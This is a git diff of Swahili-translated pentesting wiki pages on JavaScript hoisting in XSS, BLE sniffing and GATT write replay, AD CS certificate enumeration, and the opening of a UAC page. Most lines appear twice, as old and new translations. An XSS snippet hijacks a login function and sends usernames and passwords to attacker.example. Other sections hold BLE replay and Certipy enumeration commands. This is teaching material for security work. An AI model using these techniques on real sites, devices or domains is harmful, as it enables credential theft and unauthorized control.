3. Aina hii hubadilisha tabia ndani ya scope yake kwa sababu tamko la variable linazingatiwa kabla ya mstari wake wa tamko halisi.
4. Madhara ya tamko hufanyika kabla sehemu nyingine za msimbo zinazojumuisha tamko hilo hazijachambuliwa.
Kwa undani, function declarations zinaonyesha tabia ya hoisting ya aina ya 1. `var` inadhihirisha tabia ya aina ya 2. Lexical declarations, ambazo ni pamoja na `let`, `const`, na `class`, zinaonyesha tabia ya aina ya 3. Mwishowe, statements za `import` ni za kipekee kwa kuwa zinahoisted kwa tabia za aina ya 1 na aina ya 4.
Kwa undani, function declarations zinaonyesha tabia ya hoisting ya aina ya 1. Udhani wa `var` unaonyesha tabia ya aina ya 2. Lexical declarations, ambazo zinajumuisha `let`, `const`, na `class`, zinaonyesha tabia ya aina ya 3. Mwishowe, tamko za `import` ni za kipekee kwa kuwa zinahoist zikiwa na tabia za aina ya 1 na aina ya 4.
## Scenarios
## Mifano
Kwa hiyo ikiwa una matukio ambapo unaweza **Inject JS code after an undeclared object** inatumiwa, unaweza **fix the syntax** kwa kuitangaza (hivyo msimbo wako unatekelezwa badala ya kutoa error):
Kwa hivyo ikiwa una senario ambapo unaweza kuingiza msimbo wa JS baada ya object isiyotangazwa kutumika, unaweza kurekebisha sintaksia kwa kuitangaza (ili msimbo wako utekelezwe badala ya kutoa hitilafu):
```javascript
// The function vulnerableFunction is not defined
vulnerableFunction('test', '<INJECTION>');
@ -68,7 +68,7 @@ alert(1);
test.cookie("leo", "INJECTION")
test[("cookie", "injection")]
```
## Matukio Mengine
## Mifano Zaidi
```javascript
// Undeclared var accessing to an undeclared method
x.y(1,INJECTION)
@ -131,7 +131,7 @@ trigger()
```
### Zuia tamko za baadaye kwa kufunga jina kwa const
Ikiwa unaweza kutekeleza kabla ya `function foo(){...}` ya ngazi ya juu kusomwa, kutangaza lexical binding kwa jina lile lile (mf., `const foo = ...`) kutaizuia tamko la function la baadaye kuunganisha tena kitambulisho hicho. Hii inaweza kutumika vibaya katika RXSS kuchukua udhibiti wa handlers muhimu zilizofafanuliwa baadaye kwenye ukurasa:
Ikiwa unaweza kutekeleza kabla ya `function foo(){...}` ya ngazi ya juu kusomwa, kutangaza lexical binding yenye jina sawa (kwa mfano, `const foo = ...`) kutaizuia tamko la function la baadaye kulibadilisha tena kitambulisho hicho. Hii inaweza kutumiwa vibaya katika RXSS ku-hijack critical handlers zilizofafanuliwa baadaye kwenye ukurasa:
```javascript
// Malicious code runs first (e.g., earlier inline <script>)
const DoLogin = () => {
@ -143,11 +143,11 @@ fetch('https://attacker.example/?u='+encodeURIComponent(user)+'&p='+encodeURICom
// Later, the legitimate page tries to declare:
function DoLogin(){ /* ... */ } // cannot override the existing const binding
```
Vidokezo
Notes
- Hii inategemea mpangilio wa utekelezaji na global (top-level) scope.
- Ikiwa payload yako inatekelezwa ndani ya `eval()`, kumbuka kwamba `const/let` ndani ya `eval` ni block-scoped na hazitaunda global bindings. Ingiza element mpya ya `<script>` yenye code ili kuanzisha `const` ya kweli ya global.
- Kama payload yako inatekelezwa ndani ya `eval()`, kumbuka kwamba `const/let` ndani ya `eval` ni block-scoped na hazitaunda global bindings. Inject kipengee kipya `<script>` chenye code ili kuanzisha true global `const`.
## Marejeo
## References
- [https://jlajara.gitlab.io/Javascript_Hoisting_in_XSS_Scenarios](https://jlajara.gitlab.io/Javascript_Hoisting_in_XSS_Scenarios)
- [https://developer.mozilla.org/en-US/docs/Glossary/Hoisting](https://developer.mozilla.org/en-US/docs/Glossary/Hoisting)

56
src/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md
View File

@ -4,21 +4,21 @@
## Utangulizi
Iliyopatikana tangu muundo wa Bluetooth 4.0, BLE hutumia chaneli 40 tu, zikiwafunika anuwai ya 2400 hadi 2483.5 MHz. Kwa kulinganisha, Bluetooth ya jadi hutumia chaneli 79 katika anuwai ile ile.
Inapatikana tangu specification ya Bluetooth 4.0, BLE inatumia chaneli 40 tu, ikifunika safu ya 2400 hadi 2483.5 MHz. Kwa upande mwingine, Bluetooth ya jadi inatumia chaneli 79 katika safu hiyo hiyo.
Vifaa vya BLE huwasiliana kwa kutuma **paketi za matangazo** (**beacons**), paketi hizi hutangaza uwepo wa kifaa cha BLE kwa vifaa vingine vilivyokaribu. Beacons hizi wakati mwingine pia **hutuma data**.
Vifaa vya BLE huwasiliana kwa kutuma **advertising packets** (**beacons**); vifurushi hivi vinatangaza kuwepo kwa kifaa cha BLE kwa vifaa vingine vilivyo karibu. Beacons hizi pia wakati mwingine **send data**.
Kifaa kinachosikiliza, kinachoitwa pia kifaa cha kati, kinaweza kujibu paketi ya matangazo kwa **SCAN request** iliyotumwa maalum kwa kifaa kinachoatangaza. **Response** ya skani hiyo inatumia muundo ule ule wa paketi ya **advertising** pamoja na taarifa za ziada ambazo hazikuweza kuingia kwenye ombi la matangazo la awali, kama jina kamili la kifaa.
Kifaa kinachosikiliza, kinachoitwa pia central device, kinaweza kujibu advertising packet kwa **SCAN request** iliyotumwa maalum kwa kifaa kinacho-advertise. The **response** kwa scan hiyo inatumia muundo ule ule wa **advertising** packet pamoja na taarifa za ziada ambazo hazikuweza kufaa kwenye request ya mwanzo ya advertising, kama jina kamili la kifaa.
![](<../../images/image (152).png>)
Byte ya preamble inalinganisha mzunguko wa frequency, wakati anwani ya upatikanaji ya bytes nne ni **kitambulisho cha connection**, ambacho kinatumika katika matukio ambapo vifaa vingi vinajaribu kuanzisha connections kwenye chaneli zile zile. Ifuatayo, Protocol Data Unit (**PDU**) ina **data ya matangazo**. Kuna aina kadhaa za PDU; zilizotumika sana ni ADV_NONCONN_IND na ADV_IND. Vifaa vinatumia aina ya PDU **ADV_NONCONN_IND** ikiwa havukubali connections, vikituma data tu kwenye paketi ya matangazo. Vifaa vinatumia **ADV_IND** ikiwa vinaruhusu connections na **kuacha kutuma paketi za matangazo** mara tu **connection** itakapokuwa **imeanzishwa**.
The preamble byte huoanisha frequency, whereas the four-byte access address ni **connection identifier**, inayotumika katika matukio ambapo vifaa vingi vinajaribu kuanzisha connections kwenye chaneli zile zile. Ifuatayo, Protocol Data Unit (**PDU**) ina **advertising data**. Kuna aina kadhaa za PDU; zinazotumika zaidi ni ADV_NONCONN_IND na ADV_IND. Vifaa vinatumia aina ya PDU **ADV_NONCONN_IND** ikiwa havipokei connections, vikituma data tu katika advertising packet. Vifaa vinatumia **ADV_IND** ikiwa vinaruhusu connections na **stop sending advertising** packets mara tu **connection** itakapokuwa **established**.
### GATT
The **Generic Attribute Profile** (GATT) inafafanua jinsi **kifaa kinavyopaswa kuunda muundo na kuhamisha data**. Unapokuwa unachambua uso wa shambulio wa kifaa cha BLE, mara nyingi utaelekeza umakini wako kwenye GATT (au GATTs), kwa sababu ndicho jinsi **utendaji wa kifaa unavyochochewa** na jinsi data inavyohifadhiwa, kuunganishwa, na kubadilishwa. GATT inaorodhesha sifa (characteristics), descriptors, na services za kifaa kwenye jedwali kama thamani za 16- au 32-bits. Sifa (**characteristic**) ni thamani ya **data** inayo **tumwa** kati ya kifaa cha kati na peripheral. Sifa hizi zinaweza kuwa na **descriptors** zinazotoa **taarifa za ziada juu yao**. **Characteristics** mara nyingi **huwekwa pamoja** katika **services** ikiwa zinahusiana na kutekeleza kitendo fulani.
The **Generic Attribute Profile** (GATT) inaeleza jinsi kifaa kinavyopaswa kupanga na kusafirisha data. Unapoangalia attack surface ya kifaa cha BLE, mara nyingi utazingatia GATT (au GATTs), kwa sababu ndiyo njia ambapo **device functionality gets triggered** na jinsi data inavyohifadhiwa, kuunganishwa, na kubadilishwa. GATT inaorodhesha characteristics, descriptors, na services za kifaa katika jedwali kwa thamani za 16- au 32-bits. A **characteristic** ni thamani ya **data** inayotumwa kati ya central device na peripheral. Characteristics hizi zinaweza kuwa na **descriptors** ambazo **provide additional information about them**. **Characteristics** mara nyingi **grouped** katika **services** ikiwa zinahusiana na kutekeleza kitendo fulani.
## Uorodheshaji
## Orodhesho
```bash
hciconfig #Check config, check if UP or DOWN
# If DOWN try:
@ -30,8 +30,8 @@ spooftooph -i hci0 -a 11:22:33:44:55:66
```
### GATTool
**GATTool** inaruhusu **kuanzisha** **muunganisho** na kifaa kingine, ikiorodhesha **characteristics** za kifaa hicho, na kusoma na kuandika **attributes** zake.\
GATTTool inaweza kuanzisha shell ya mwingiliano kwa chaguo la `-I`:
**GATTool** inaruhusu kuanzisha muunganisho na kifaa kingine, kuorodhesha sifa za kifaa hicho, na kusoma na kuandika tabia zake.\
GATTTool inaweza kuzindua shell ya mwingiliano kwa chaguo la `-I`:
```bash
gatttool -i hci0 -I
[ ][LE]> connect 24:62:AB:B1:A8:3E Attempting to connect to A4:CF:12:6C:B3:76 Connection successful
@ -64,13 +64,13 @@ sudo bettercap --eval "ble.recon on"
>> ble.write <MAC ADDR> <UUID> <HEX DATA>
>> ble.write <mac address of device> ff06 68656c6c6f # Write "hello" in ff06
```
## Sniffing na kudhibiti moja kwa moja vifaa vya BLE visivyo na pairing
## Sniffing and actively controlling unpaired BLE devices
Vifaa vingi vya BLE vya bei nafuu havutekelezi pairing/bonding. Bila bonding, Link Layer encryption haiwezwi kamwe, hivyo ATT/GATT traffic iko kwa cleartext. Off-path sniffer inaweza kufuatilia connection, decode GATT operations ili kupata characteristic handles na values, na host yeyote uliye karibu anaweza kisha kuungana na ku-replay hizo writes ili kudhibiti kifaa.
Many low-cost BLE peripherals do not enforce pairing/bonding. Without bonding, the Link Layer encryption is never enabled, so ATT/GATT traffic is in cleartext. An off-path sniffer can follow the connection, decode GATT operations to learn characteristic handles and values, and any nearby host can then connect and replay those writes to control the device.
### Sniffing na Sniffle (CC26x2/CC1352)
### Sniffing with Sniffle (CC26x2/CC1352)
Hardware: Sonoff Zigbee 3.0 USB Dongle Plus (CC26x2/CC1352) iliyoflashwa tena na NCC Groups Sniffle firmware.
Vifaa: Sonoff Zigbee 3.0 USB Dongle Plus (CC26x2/CC1352) iliyoflash upya na NCC Groups Sniffle firmware.
Sakinisha Sniffle na Wireshark extcap yake kwenye Linux:
```bash
@ -91,7 +91,7 @@ else
echo "[+] - Sniffle already installed at 1.10.0"
fi
```
Flash Sonoff na firmware ya Sniffle (hakikisha kifaa chako cha serial kinalingana, kwa mfano /dev/ttyUSB0):
Flash Sonoff na Sniffle firmware (hakikisha kifaa chako cha serial kinalingana, kwa mfano /dev/ttyUSB0):
```bash
pushd /opt/sniffle/
wget https://github.com/nccgroup/Sniffle/releases/download/v1.10.0/sniffle_cc1352p1_cc2652p1_1M.hex
@ -104,13 +104,13 @@ python3 cc2538-bsl.py -p /dev/ttyUSB0 --bootloader-sonoff-usb -ewv ../sniffle_cc
deactivate
popd
```
Chukua katika Wireshark kupitia Sniffle extcap na quickly pivot to state-changing writes kwa kuchuja:
Kamata katika Wireshark kupitia extcap ya Sniffle na badilisha kwa haraka kuelekea uandikaji unaobadilisha hali kwa kuchuja:
```text
_ws.col.info contains "Sent Write Command"
```
Hii inaonyesha ATT Write Commands kutoka kwa client; handle na value mara nyingi zinafananishwa moja kwa moja na vitendo vya kifaa (kwa mfano, andika 0x01 kwenye buzzer/alert characteristic, 0x00 kuacha).
Hii inaonyesha ATT Write Commands kutoka kwa client; handle na value mara nyingi huambatana moja kwa moja na vitendo vya kifaa (kwa mfano, write 0x01 kwenye buzzer/alert characteristic, 0x00 kuacha).
Sniffle CLI mifano ya haraka:
Mifano ya haraka ya Sniffle CLI:
```bash
python3 scanner.py --output scan.pcap
# Only devices with very strong signal
@ -118,18 +118,18 @@ python3 scanner.py --rssi -40
# Filter advertisements containing a string
python3 sniffer.py --string "banana" --output sniff.pcap
```
Alternative sniffer: Nordics nRF Sniffer for BLE + Wireshark plugin pia hufanya kazi. Kwa dongle ndogo/bei nafuu za Nordic mara nyingi unaandika juu bootloader ya USB ili kupakia firmware ya sniffer, hivyo au unahifadhi dongle maalum ya sniffer au unahitaji J-Link/JTAG kurejesha bootloader baadaye.
Mbadala ya sniffer: Nordics nRF Sniffer for BLE + Wireshark plugin pia inafanya kazi. Kwa Nordic dongles ndogo/ccinachoharibu kawaida unaandika juu USB bootloader ili kupakia sniffer firmware, hivyo au unaweka dongle maalum ya sniffer au unahitaji J-Link/JTAG kurejesha bootloader baadaye.
### Udhibiti hai kupitia GATT
Mara tu utakapobaini writable characteristic handle na value kutoka kwa trafiki iliyosniffwa, ungana kama central yoyote na fanya write ileile:
Mara tu unapobaini writable characteristic handle and value kutoka kwa sniffed traffic, unganisha kama central yoyote na tuma write ile ile:
- With Nordic nRF Connect for Desktop (BLE app):
- Chagua dongle ya nRF52/nRF52840, scan na connect kwenye target.
- Vinjari GATT database, tafuta target characteristic (mara nyingi ina jina la kirafiki, e.g., Alert Level).
- Fanya Write na bytes zilizosniffwa (e.g., 01 to trigger, 00 to stop).
- Kwa kutumia Nordic nRF Connect for Desktop (BLE app):
- Chagua nRF52/nRF52840 dongle, scan na uunganishe na target.
- Pitia GATT database, tafuta target characteristic (mara nyingi ina friendly name, kwa mfano, Alert Level).
- Fanya Write na sniffed bytes (kwa mfano, 01 kuanzisha, 00 kusitisha).
- Otomatisha kwenye Windows kwa dongle ya Nordic ukitumia Python + blatann:
- Endesha otomatiki kwenye Windows na Nordic dongle ukitumia Python + blatann:
```python
import time
import blatann
@ -169,13 +169,13 @@ peer.disconnect()
peer.wait_for_disconnect()
ble_device.close()
```
### Vidokezo vya uendeshaji na hatua za kupunguza
### Vidokezo vya uendeshaji na mbinu za kupunguza hatari
- Tumia Sonoff+Sniffle kwenye Linux kwa channel hopping na connection following imara. Weka Nordic sniffer mbadala kama backup.
- Bila pairing/bonding, attacker yeyote aliye karibu anaweza observe writes na replay/craft zao kwa unauthenticated writable characteristics.
- Hatua za kupunguza: lazimisha pairing/bonding na uweke encryption; weka ruhusa za characteristic ili ziwe zinahitaji authenticated writes; punguza unauthenticated writable characteristics kadiri iwezekanavyo; thibitisha GATT ACLs kwa kutumia Sniffle/nRF Connect.
- Pendelea Sonoff+Sniffle kwenye Linux kwa channel hopping na connection following imara. Weka Nordic sniffer ya ziada kama chelezo.
- Bila pairing/bonding, mshambuliaji yeyote aliye karibu anaweza kuona writes na replay/craft zao kwa unauthenticated writable characteristics.
- Mbinu za kupunguza: hitaji pairing/bonding na ulazimishe encryption; weka ruhusa za characteristic ili zitake authenticated writes; punguza unauthenticated writable characteristics kadri uwezavyo; thibitisha GATT ACLs kwa Sniffle/nRF Connect.
## References
## Marejeo
- [Start hacking Bluetooth Low Energy today! (part 2) Pentest Partners](https://www.pentestpartners.com/security-blog/start-hacking-bluetooth-low-energy-today-part-2/)
- [Sniffle A sniffer for Bluetooth 5 and 4.x LE](https://github.com/nccgroup/Sniffle)

94
src/windows-hardening/active-directory-methodology/ad-certificates/README.md
View File

@ -7,99 +7,99 @@
### Vipengele vya Cheti
- **Subject** ya cheti inaonyesha mmiliki wake.
- **Public Key** imeambatanishwa na ufunguo wa kibinafsi ili kuunganisha cheti na mmiliki wake halali.
- **Validity Period**, inayofafanuliwa na tarehe za **NotBefore** na **NotAfter**, inaonyesha muda wa uhalali wa cheti.
- **Serial Number** ya kipekee, inayotolewa na Certificate Authority (CA), inatambulisha kila cheti.
- **Issuer** inarejea CA iliyotolewa cheti.
- **SubjectAlternativeName** inaruhusu majina ya ziada kwa subject, ikiongeza ufanisi wa utambuzi.
- **Basic Constraints** zinaonyesha kama cheti ni kwa ajili ya CA au kwa entiti ya mwisho na zinafafanua vizuizi vya matumizi.
- **Extended Key Usages (EKUs)** zinaainisha madhumuni maalum ya cheti, kama kusaini code au kushughulikia encryption ya barua pepe, kupitia Object Identifiers (OIDs).
- **Signature Algorithm** inaelezea njia ya kusaini cheti.
- **Signature**, inayotengenezwa kwa ufunguo wa kibinafsi wa issuer, inahakikisha uhalali wa cheti.
- **Public Key** ni sambamba na key iliyohifadhiwa kwa siri ili kuunganisha cheti na mmiliki halali.
- **Validity Period**, iliyofafanuliwa kwa tarehe za **NotBefore** na **NotAfter**, inaonyesha muda cheti kinachofanya kazi.
- **Serial Number** ya kipekee, inayotolewa na Certificate Authority (CA), inatambua kila cheti.
- **Issuer** inarejea CA iliyetoa cheti.
- **SubjectAlternativeName** inaruhusu majina ya ziada kwa subject, ikiongeza kubadilika kwa utambuzi.
- **Basic Constraints** zinaonyesha kama cheti ni kwa CA au kwa entiti ya mwisho na zinafafanua vikwazo vya matumizi.
- **Extended Key Usages (EKUs)** zinaainisha madhumuni maalum ya cheti, kama code signing au email encryption, kupitia Object Identifiers (OIDs).
- **Signature Algorithm** inaeleza njia ya kusaini cheti.
- **Signature**, iliyotengenezwa kwa private key ya issuer, inahakikisha uhalali wa cheti.
### Mambo Maalum ya Kuzingatia
- **Subject Alternative Names (SANs)** huongeza matumizi ya cheti kwa vitambulisho vingi, jambo muhimu kwa seva zenye domains nyingi. Mchakato salama wa utoaji ni muhimu ili kuepuka hatari ya kuigwa au utapeli kwa wapinzani wanaoweza kubadilisha vipimo vya SAN.
- **Subject Alternative Names (SANs)** hueneza uhalali wa cheti kwa vitambulisho vingi, muhimu kwa server zenye domains nyingi. Mchakato salama wa utoaji ni muhimu ili kuepuka hatari za utapeli ambapo wadukuzi wanaweza kubadilisha vipimo vya SAN.
### Certificate Authorities (CAs) katika Active Directory (AD)
AD CS inatambua vyeti vya CA katika AD forest kupitia containers zilizotengwa, kila moja ikiwa na jukumu maalum:
AD CS inatambua vyeti vya CA ndani ya msitu wa AD kupitia makontena yaliyoteuliwa, kila mmoja ukiwa na jukumu lake la kipekee:
- **Certification Authorities** container inashikilia vyeti vya root CA vinavyoaminika.
- **Enrolment Services** container inaeleza Enterprise CAs na template zao za cheti.
- **NTAuthCertificates** object inajumuisha vyeti vya CA vinavyoruhusiwa kwa uthibitisho wa AD.
- **AIA (Authority Information Access)** container inasaidia uthibitisho wa mnyororo wa vyeti kwa vyeti vya intermediate na cross CA.
- **Certification Authorities** container ina vyeti vya CA za root vinavyotendwa kuaminiwa.
- **Enrolment Services** container inaelezea Enterprise CAs na template za vyeti zao.
- **NTAuthCertificates** object inajumuisha vyeti vya CA vilivyoidhinishwa kwa authentication ya AD.
- **AIA (Authority Information Access)** container inasaidia uhakiki wa mnyororo wa vyeti kwa vyeti vya intermediate na cross CA.
### Upataji wa Cheti: Mtiririko wa Ombi la Cheti la Mteja
### Certificate Acquisition: Client Certificate Request Flow
1. Mchakato wa ombi unaanza kwa wateja kupata Enterprise CA.
2. CSR inaundwa, ikiwa na public key na maelezo mengine, baada ya kuunda jozi ya ufunguo wa umma/wa kibinafsi.
3. CA inapima CSR dhidi ya template za cheti zilizo wazi, na kutoa cheti kulingana na ruhusa za template.
4. Baada ya kuidhinishwa, CA inasaini cheti kwa ufunguo wake wa kibinafsi na kurirudisha kwa mteja.
1. Mchakato wa ombi huanza kwa wateja kutafuta Enterprise CA.
2. CSR inaundwa, ikiwa na public key na maelezo mengine, baada ya kutengeneza jozi ya public-private key.
3. CA inakagua CSR dhidi ya template za vyeti zilizopo, ikitoa cheti kulingana na ruhusa za kiolezo.
4. Baada ya kuidhinishwa, CA inasaini cheti kwa private key yake na kurudisha kwa mteja.
### Violezo vya Cheti
### Certificate Templates
Violezo hivi vinavyowekwa ndani ya AD vinaeleza mipangilio na ruhusa za kutoa vyeti, ikiwa ni pamoja na EKUs zinazoruhusiwa na haki za kujiandikisha au kuhariri, muhimu kwa kusimamia ufikiaji kwa huduma za vyeti.
Zilizoainishwa ndani ya AD, violezo hivi vinaelezea mipangilio na ruhusa za kutoa vyeti, ikiwa ni pamoja na EKUs zinazoruhusiwa na haki za usajili au uhariri, muhimu kwa kusimamia ufikiaji wa huduma za cheti.
## Usajili wa Cheti
Mchakato wa usajili wa vyeti unaanzishwa na msimamizi anayehubiri **kuunda template ya cheti**, ambayo kisha **inachapishwa** na Enterprise Certificate Authority (CA). Hii inafanya template kupatikana kwa ajili ya usajili wa mteja, hatua ambayo hufikiwa kwa kuongeza jina la template kwenye shamba la `certificatetemplates` la kitu katika Active Directory.
Mchakato wa usajili wa vyeti unaanzishwa na msimamizi anayeyaunda **certificate template**, ambayo kisha **huchapishwa** na Enterprise Certificate Authority (CA). Hii hufanya kiolezo kupatikana kwa usajili wa mteja, hatua inayofikiwa kwa kuongeza jina la kiolezo kwenye uwanja wa `certificatetemplates` wa kitu cha Active Directory.
Ili mteja aombe cheti, lazima apewe **haki za usajili**. Haki hizi zinafafanuliwa na security descriptors kwenye template ya cheti na kwenye Enterprise CA yenyewe. Ruhusa lazima zitatekelezwa katika maeneo yote mawili ili ombi lifanikiwe.
Ili mteja kuomba cheti, lazima apewe **haki za usajili**. Haki hizi zimetengwa na security descriptors kwenye kiolezo cha cheti na kwenye Enterprise CA yenyewe. Ruhusa lazima zichukuliwe katika maeneo yote mawili ili ombi lifanikiwe.
### Haki za Usajili za Template
### Haki za Usajili za Kiolezo
Haki hizi zinaainishwa kupitia Access Control Entries (ACEs), zikieleza ruhusa kama:
Haki hizi zinaainishwa kupitia Access Control Entries (ACEs), zikielezea ruhusa kama:
- Haki za **Certificate-Enrollment** na **Certificate-AutoEnrollment**, kila moja ikiwa na GUID maalum.
- **ExtendedRights**, kuruhusu ruhusa zote zilizopanuliwa.
- **FullControl/GenericAll**, kutoa udhibiti kamili juu ya template.
- **Certificate-Enrollment** na **Certificate-AutoEnrollment** rights, kila moja ikihusishwa na GUID maalum.
- **ExtendedRights**, ikiruhusu ruhusa zote za ziada.
- **FullControl/GenericAll**, ikitoa udhibiti kamili juu ya kiolezo.
### Haki za Usajili za Enterprise CA
Haki za CA zimetajwa katika security descriptor yake, inayopatikana kupitia consola ya Certificate Authority. Mipangilio fulani hata inaweza kuruhusu watumiaji wenye hadhi ndogo kufikia mbali, jambo ambalo linaweza kuwa hatari kwa usalama.
Haki za CA zimetajwa kwenye security descriptor yake, inayopatikana kupitia Certificate Authority management console. Baadhi ya mipangilio hata inaruhusu watumiaji wenye haki ndogo ufikiaji wa mbali, jambo ambalo linaweza kuwa hatari kwa usalama.
### Udhibiti wa Ziada wa Utoaji
Udhibiti fulani unaweza kutumika, kama vile:
Udhibiti fulani unaweza kutumika, kama:
- **Manager Approval**: Inuweka maombi katika hali ya kusubiri hadi idhini itolewe na meneja wa vyeti.
- **Enrolment Agents and Authorized Signatures**: Huweka idadi ya saini zinazohitajika kwenye CSR na Application Policy OIDs zinazohitajika.
- **Manager Approval**: Inaweka maombi katika hali ya kusubiri hadi yaidhinishwe na meneja wa vyeti.
- **Enrolment Agents and Authorized Signatures**: Huaeleza idadi ya saini zinazohitajika kwenye CSR na Application Policy OIDs zinazohitajika.
### Njia za Kuomba Vyeti
### Mbinu za Kuomba Vyeti
Vyeti vinaweza kuombwa kupitia:
1. **Windows Client Certificate Enrollment Protocol** (MS-WCCE), kwa kutumia interfaces za DCOM.
1. **Windows Client Certificate Enrollment Protocol** (MS-WCCE), kwa kutumia DCOM interfaces.
2. **ICertPassage Remote Protocol** (MS-ICPR), kupitia named pipes au TCP/IP.
3. kiolesura cha wavuti cha **certificate enrollment**, ikiwa role ya Certificate Authority Web Enrollment imewekwa.
4. **Certificate Enrollment Service** (CES), pamoja na Certificate Enrollment Policy (CEP) service.
5. **Network Device Enrollment Service** (NDES) kwa vifaa vya mtandao, kwa kutumia Simple Certificate Enrollment Protocol (SCEP).
3. interface ya wavuti ya certificate enrollment, kwa kusakinisha Certificate Authority Web Enrollment role.
4. **Certificate Enrollment Service** (CES), kwa pamoja na huduma ya Certificate Enrollment Policy (CEP).
5. **Network Device Enrollment Service** (NDES) kwa vifaa vya mtandao, ikitumia Simple Certificate Enrollment Protocol (SCEP).
Watumiaji wa Windows pia wanaweza kuomba vyeti kupitia GUI (`certmgr.msc` au `certlm.msc`) au zana za mstari wa amri (`certreq.exe` au amri ya PowerShell `Get-Certificate`).
Watumiaji wa Windows pia wanaweza kuomba vyeti kupitia GUI (`certmgr.msc` au `certlm.msc`) au zana za command-line (`certreq.exe` au amri ya PowerShell `Get-Certificate`).
```bash
# Example of requesting a certificate using PowerShell
Get-Certificate -Template "User" -CertStoreLocation "cert:\\CurrentUser\\My"
```
## Uthibitishaji wa Cheti
## Uthibitishaji wa Vyeti
Active Directory (AD) inaunga mkono uthibitishaji wa vyeti, hasa ikitumia protokoli za **Kerberos** na **Secure Channel (Schannel)**.
Active Directory (AD) inaunga mkono uthibitishaji wa vyeti, hasa ikitumia protokali za **Kerberos** na **Secure Channel (Schannel)**.
### Mchakato wa Uthibitishaji wa Kerberos
Katika mchakato wa uthibitishaji wa Kerberos, ombi la mtumiaji la Ticket Granting Ticket (TGT) linasainiwa kwa kutumia **private key** ya cheti cha mtumiaji. Ombi hili hupitia uthibitisho kadhaa na domain controller, ikijumuisha **validity**, **path**, na **revocation status** ya cheti. Uthibitisho pia unajumuisha kuthibitisha kwamba cheti kinatokana na chanzo kinachotegemewa na kuthibitisha uwepo wa muuzaji katika **NTAUTH certificate store**. Uthibitisho uliopitishwa husababisha utolewaji wa TGT. Kitu cha **`NTAuthCertificates`** katika AD, kinapatikana katika:
Katika mchakato wa uthibitishaji wa Kerberos, ombi la mtumiaji la Ticket Granting Ticket (TGT) linasainiwa kwa kutumia **funguo binafsi** ya cheti cha mtumiaji. Ombi hili hupitia uthibitisho kadhaa na domain controller, ikiwa ni pamoja na **uhalali**, **mlolongo (path)**, na **hali ya kufutwa (revocation status)** ya cheti. Uthibitisho pia unajumuisha kuthibitisha kwamba cheti kimetoka kwa chanzo kinachotambulika na kuthibitisha uwepo wa mdhibitishaji katika **NTAUTH certificate store**. Uthibitisho uliofanikiwa husababisha kutolewa kwa TGT. Kitu cha **`NTAuthCertificates`** katika AD, kilicho katika:
```bash
CN=NTAuthCertificates,CN=Public Key Services,CN=Services,CN=Configuration,DC=<domain>,DC=<com>
```
ni muhimu katika kuanzisha uaminifu kwa uthibitishaji wa vyeti.
ina jukumu kuu katika kuanzisha uaminifu kwa uthibitishaji wa cheti.
### Secure Channel (Schannel) Authentication
### Uthibitishaji wa Secure Channel (Schannel)
Schannel inawezesha miunganisho salama ya TLS/SSL, ambapo wakati wa handshake, mteja huwasilisha cheti ambacho, ikiwa kimeidhinishwa kwa mafanikio, hutoa idhini ya upatikanaji. Kuambatanisha cheti kwa akaunti ya AD kunaweza kuhusisha Kerbeross **S4U2Self** function au chetis **Subject Alternative Name (SAN)**, miongoni mwa mbinu nyingine.
Schannel huwezesha muunganisho salama wa TLS/SSL, ambapo wakati wa handshake, mteja huwasilisha cheti ambacho, ikiwa kimethibitishwa kwa mafanikio, kinaruhusu upatikanaji. Ulinganifu wa cheti na akaunti ya AD unaweza kuhusisha kipengele cha Kerberos **S4U2Self** au **Subject Alternative Name (SAN)** ya cheti, miongoni mwa mbinu nyingine.
### AD Certificate Services Enumeration
AD's certificate services zinaweza kuorodheshwa kupitia maswali ya LDAP, zikifichua taarifa kuhusu **Enterprise Certificate Authorities (CAs)** na usanidi wao. Hii inapatikana kwa mtumiaji yeyote aliye domain-authenticated bila vibali maalum. Zana kama **[Certify](https://github.com/GhostPack/Certify)** na **[Certipy](https://github.com/ly4k/Certipy)** zinatumiwa kwa ajili ya kuorodhesha na tathmini ya udhaifu katika mazingira ya AD CS.
Huduma za cheti za AD zinaweza kuorodheshwa kupitia maswali ya LDAP, zikifichua taarifa kuhusu **Enterprise Certificate Authorities (CAs)** na usanidi wao. Hii inapatikana kwa mtumiaji yeyote aliyeathibitishwa kwenye domaine bila ruhusa maalum. Zana kama **[Certify](https://github.com/GhostPack/Certify)** na **[Certipy](https://github.com/ly4k/Certipy)** zinatumiwa kwa uorodheshaji na tathmini ya udhaifu katika mazingira ya AD CS.
Amri za kutumia zana hizi ni pamoja na:
```bash
@ -125,7 +125,7 @@ certipy find -vulnerable -u john@corp.local -p Passw0rd -dc-ip 172.16.126.128
certutil.exe -TCAInfo
certutil -v -dstemplate
```
## Marejeo
## Marejeleo
- [https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf](https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf)
- [https://comodosslstore.com/blog/what-is-ssl-tls-client-authentication-how-does-it-work.html](https://comodosslstore.com/blog/what-is-ssl-tls-client-authentication-how-does-it-work.html)

517
src/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
View File

File diff suppressed because it is too large Load Diff

117
src/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md
View File

@ -1,59 +1,59 @@
# UAC - Udhibiti wa Akaunti ya Mtumiaji
# UAC - User Account Control
{{#include ../../banners/hacktricks-training.md}}
## UAC
[User Account Control (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) ni kipengele kinachowezesha **kidokezo cha idhini kwa shughuli zinazohitaji mamlaka ya juu**. Programu zina ngazi mbalimbali za `integrity`, na programu yenye **ngazi ya juu** inaweza kufanya kazi ambazo zinaweza **kuathiri usalama wa mfumo**. Wakati UAC imewezeshwa, programu na shughuli zinaendesha kila wakati **chini ya muktadha wa usalama wa akaunti isiyo ya msimamizi** isipokuwa msimamizi kwa wazi awaruhusu programu/shughuli hizo kupata ufikiaji wa kiwango cha msimamizi kwenye mfumo ili kuendesha. Ni kipengele cha urahisi kinachowalinda wasimamizi dhidi ya mabadiliko yasiyotarajiwa lakini haizingatiwi kama mpaka wa usalama.
